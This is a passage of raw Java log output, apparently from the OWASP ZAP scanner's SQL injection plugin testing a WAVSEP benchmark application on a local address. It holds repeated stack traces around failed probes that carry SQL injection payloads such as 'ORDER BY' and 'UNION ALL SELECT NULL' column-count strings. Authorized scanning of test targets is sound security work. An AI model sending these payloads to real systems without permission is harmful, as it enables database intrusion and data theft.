org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682544 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682545 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 4904#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 4904# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682545 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682546 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682547 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682548 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682549 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682549 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682550 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682551 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682552 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682553 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682554 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) 